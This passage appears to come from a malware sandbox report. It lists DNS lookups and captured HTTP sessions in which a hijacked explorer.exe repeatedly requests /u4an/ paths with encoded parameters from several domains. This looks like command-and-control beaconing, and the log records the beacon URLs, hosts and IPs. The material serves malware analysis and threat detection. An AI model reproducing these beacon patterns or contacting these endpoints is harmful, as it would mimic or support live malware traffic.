                                                                  Sep 27, 2021 17:32:18.620323896 CEST8.8.8.8192.168.2.220x30e0No error (0)multicoininvestment.com162.0.229.241A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:23.973058939 CEST8.8.8.8192.168.2.220x9037No error (0)www.theseattlenotary.comtheseattlenotary.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:23.973058939 CEST8.8.8.8192.168.2.220x9037No error (0)theseattlenotary.com162.0.232.162A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.32.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.34.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.38.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.435094118 CEST8.8.8.8192.168.2.220xce43No error (0)www.petersonmovingco.com216.239.36.21A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:39.821504116 CEST8.8.8.8192.168.2.220xb02bNo error (0)www.quinnwebster.topquinnwebster.topCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:39.821504116 CEST8.8.8.8192.168.2.220xb02bNo error (0)quinnwebster.top162.251.85.174A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:45.198246956 CEST8.8.8.8192.168.2.220x43f4No error (0)www.lianxiwan.xyz101.35.124.222A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:08.168354034 CEST8.8.8.8192.168.2.220x9ff7No error (0)www.lianxiwan.xyz101.35.124.222A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:11.279463053 CEST8.8.8.8192.168.2.220x1d11No error (0)www.area-arquitectos.com93.185.100.223A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.wwiilive.com
                                                                  • www.dunedinhyperlocal.com
                                                                  • www.oinfoproduto.com
                                                                  • www.multicoininvestment.com
                                                                  • www.theseattlenotary.com
                                                                  • www.petersonmovingco.com
                                                                  • www.quinnwebster.top

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.224916534.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:31:56.380229950 CEST0OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1
                                                                  Host: www.wwiilive.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:31:56.559993982 CEST1INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Mon, 27 Sep 2021 15:31:56 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "6151bf8f-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.2249166184.168.131.24180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:01.790482998 CEST2OUTGET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
                                                                  Host: www.dunedinhyperlocal.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:02.171308994 CEST2INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.20.1
                                                                  Date: Mon, 27 Sep 2021 15:32:02 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Location: https://www.dunedinhyperlocal.com/u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.2249167216.172.172.20880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:07.491132975 CEST3OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1
                                                                  Host: www.oinfoproduto.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:08.474100113 CEST3INHTTP/1.1 301 Moved Permanently
                                                                  Date: Mon, 27 Sep 2021 15:32:07 GMT
                                                                  Server: Apache
                                                                  X-UA-Compatible: IE=edge
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Location: http://oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==
                                                                  Content-Length: 0
                                                                  Content-Type: text/html; charset=UTF-8


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.2249168162.0.229.24180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:18.785186052 CEST4OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1
                                                                  Host: www.multicoininvestment.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:18.948822021 CEST6INHTTP/1.1 301 Moved Permanently
                                                                  keep-alive: timeout=5, max=100
                                                                  content-type: text/html
                                                                  content-length: 707
                                                                  date: Mon, 27 Sep 2021 15:32:18 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==
                                                                  x-turbo-charged-by: LiteSpeed
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.2249169162.0.232.16280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:24.141268015 CEST6OUTGET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
                                                                  Host: www.theseattlenotary.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:24.307697058 CEST8INHTTP/1.1 301 Moved Permanently
                                                                  keep-alive: timeout=5, max=100
                                                                  content-type: text/html
                                                                  content-length: 707
                                                                  date: Mon, 27 Sep 2021 15:32:24 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz
                                                                  x-turbo-charged-by: LiteSpeed
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.2249170216.239.32.2180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:29.450268984 CEST8OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1
                                                                  Host: www.petersonmovingco.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:29.531821966 CEST10INHTTP/1.1 200 OK
                                                                  Content-Type: text/html; charset=utf-8
                                                                  x-ua-compatible: IE=edge
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Mon, 27 Sep 2021 15:32:29 GMT
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Cross-Origin-Opener-Policy: unsafe-none
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Q2VDqHH8JEhHLrd9BvMcDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Server: ESF
                                                                  X-XSS-Protection: 0
                                                                  X-Content-Type-Options: nosniff
                                                                  Set-Cookie: NID=511=Wbsymr0SWWRHD-rgYevkhlyxEht6VWs54689I0H8buzMRXggbGvzdbaW38cH3R9CI0-WqXrcOYZhJqr4bhoRK_izgLLSbsYN41B7yTQNTDIkOaKP9zhPiH4b7pQo9_Dxe6RieNOgYlXHOAGFDnfGUZNbKpODKC8TiUvlRaTWHjc; expires=Tue, 29-Mar-2022 15:32:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Accept-Ranges: none
                                                                  Vary: Accept-Encoding
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 51 32 56 44 71 48 48 38 4a 45 68 48 4c 72 64 39 42 76 4d 63 44 77 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67
                                                                  Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/Locuseriness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Q2VDqHH8JEhHLrd9BvMcDw">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.goog
                                                                  Sep 27, 2021 17:32:29.531872034 CEST11INData Raw: 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 2f 2a 22 2c 22 2f 70 6f 73 74 73 2f 6c 2f 3a 6c 69 73 74 69 6e 67 49
                                                                  Data Ascii: le.com","EP1ykd":["/_/*","/local/business","/local/business/*","/posts/l/:listingId","/restaurants","/restaurants/*","/website/_/*","/website/demo","/website/demo/","/website/demo/*"],"FdrFJe":"2807620777109307761","Im6cmf":"/_/GeoMerchantPres
                                                                  Sep 27, 2021 17:32:29.531902075 CEST13INData Raw: 55 69 22 2c 22 71 79 61 6f 64 63 22 3a 66 61 6c 73 65 2c 22 71 79 6d 56 65 22 3a 22 78 76 65 5f 4b 4c 4d 6a 76 46 74 73 6a 34 41 51 7a 4c 30 64 47 5f 35 58 37 2d 51 22 2c 22 72 74 51 43 78 63 22 3a 2d 31 32 30 2c 22 72 76 4f 6c 46 64 22 3a 22 50
                                                                  Data Ascii: Ui","qyaodc":false,"qymVe":"xve_KLMjvFtsj4AQzL0dG_5X7-Q","rtQCxc":-120,"rvOlFd":"PAGE_SOURCE_UNKNOWN","tHwb2":false,"v9NS6b":"27071008839149950","vVkaEb":"","vXmutd":"%.@.\"CH\",\"ZZ\",\"ub2WSA\\u003d\\u003d\"]","w2btAe":"%.@.null,null,\"\",tr
                                                                  Sep 27, 2021 17:32:29.531925917 CEST14INData Raw: 65 66 61 75 6c 74 56 69 65 77 3b 69 66 28 65 26 26 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 26 26 28 65 3d 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 63 29 2c 22 30 70 78 22 3d 3d 65 2e 68 65 69 67 68 74 7c 7c 22 30 70
                                                                  Data Ascii: efaultView;if(e&&e.getComputedStyle&&(e=e.getComputedStyle(c),"0px"==e.height||"0px"==e.width||"hidden"==e.visibility&&!g))return!1;if(!c.getBoundingClientRect)return!0;e=c.getBoundingClientRect();c=e.left+a.pageXOffset;g=e.top+a.pageYOffset;
                                                                  Sep 27, 2021 17:32:29.531981945 CEST15INData Raw: 68 69 64 64 65 6e 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72
                                                                  Data Ascii: hidden;color:#202124;font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif;margin:0;text-size-adjust:100%}textarea{font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif}a{text-decoration:none;color:#1967d2}img{border:none}#apps-debug-t
                                                                  Sep 27, 2021 17:32:29.532075882 CEST17INData Raw: 61 75 74 6f 7d 2e 77 37 57 49 47 62 20 2e 53 56 70 50 63 64 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 70 78 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 7d 2e 77 37 57 49 47 62 20 2e 79 35 42 7a 33 7b 6f 70 61 63
                                                                  Data Ascii: auto}.w7WIGb .SVpPcd{transform:translateY(-5px) rotate(-45deg)}.w7WIGb .y5Bz3{opacity:0}.w7WIGb .ihSjwf{transform:translateY(5px) rotate(45deg)}@keyframes quantumWizBoxInkSpread{0%{transform:translate(-50%,-50%) scale(.2)}to{transform:translat
                                                                  Sep 27, 2021 17:32:29.532104969 CEST18INData Raw: 6f 76 65 72 2c 2e 65 33 44 75 75 62 20 61 3a 6c 69 6e 6b 2c 2e 65 33 44 75 75 62 20 61 3a 76 69 73 69 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 37 33 65 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 48 51 38 79 66 2c 2e 48 51 38 79 66 20
                                                                  Data Ascii: over,.e3Duub a:link,.e3Duub a:visited{background:#1a73e8;color:#fff}.HQ8yf,.HQ8yf a{color:#1a73e8}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:transparent}.O0WRkf.u3bW4e .ZFr60d{background
                                                                  Sep 27, 2021 17:32:29.532128096 CEST19INData Raw: 69 72 63 6c 65 20 66 61 72 74 68 65 73 74 2d 73 69 64 65 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 2e 31 36 31 29 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 2e 31 36 31 29 20 38 30 25 2c 72 67 62 61 28 32 36 2c 31 31 35 2c
                                                                  Data Ascii: ircle farthest-side,rgba(26,115,232,0.161),rgba(26,115,232,0.161) 80%,rgba(26,115,232,0) 100%)}.e3Duub .Vwe4Vb{background-image:radial-gradient(circle farthest-side,rgba(255,255,255,0.322),rgba(255,255,255,0.322) 80%,rgba(255,255,255,0) 100%)}
                                                                  Sep 27, 2021 17:32:29.532151937 CEST21INData Raw: 68 65 69 67 68 74 20 30 2e 32 73 20 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 30 2c 30 2e 30 2c 30 2e 32 2c 31 29 20 2c 6f 70 61 63 69 74 79 20 30 2e 30 35 73 20 6c 69 6e 65 61 72 2c 74 6f 70 20 30 2e 32 73 20 63 75 62 69 63 2d 62 65 7a 69
                                                                  Data Ascii: height 0.2s cubic-bezier(0.0,0.0,0.2,1) ,opacity 0.05s linear,top 0.2s cubic-bezier(0.0,0.0,0.2,1)}.JPdR6b.jVwmLb{max-height:56px;opacity:0}.JPdR6b.CAwICe{overflow:hidden}.JPdR6b.oXxKqf{transition:none}.z80M1{color:#222;cursor:pointer;display
                                                                  Sep 27, 2021 17:32:29.532176971 CEST22INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 66 61 72 74 68 65 73 74 2d 73 69 64 65 2c 23 62 64 63 31 63 36 2c 23 62 64 63 31 63 36 20 38 30 25 2c 72 67 62 61 28 31 38 39 2c
                                                                  Data Ascii: ackground-image:radial-gradient(circle farthest-side,#bdc1c6,#bdc1c6 80%,rgba(189,193,198,0) 100%);background-size:cover;opacity:1;top:0;left:0}.J0XlZe{color:inherit;line-height:40px;padding:0 6px 0 1em}.a9caSc{color:inherit;direction:ltr;padd
                                                                  Sep 27, 2021 17:32:29.544748068 CEST23INData Raw: 61 6c 65 58 28 30 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 35 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 35 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 2e 46 4b 46 36 6d 63 2c 2e
                                                                  Data Ascii: aleX(0)}50%{transform:scaleX(5)}to{transform:scaleX(5) translateX(100%)}}.FKF6mc,.FKF6mc:focus{display:block;outline:none;text-decoration:none}.FKF6mc:visited{fill:inherit;stroke:inherit}.U26fgb.u3bW4e{outline:1px solid transparent}.C0oVfc{lin


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.2249171162.251.85.17480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:39.962572098 CEST52OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1
                                                                  Host: www.quinnwebster.top
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:40.120680094 CEST53INHTTP/1.1 404 Not Found
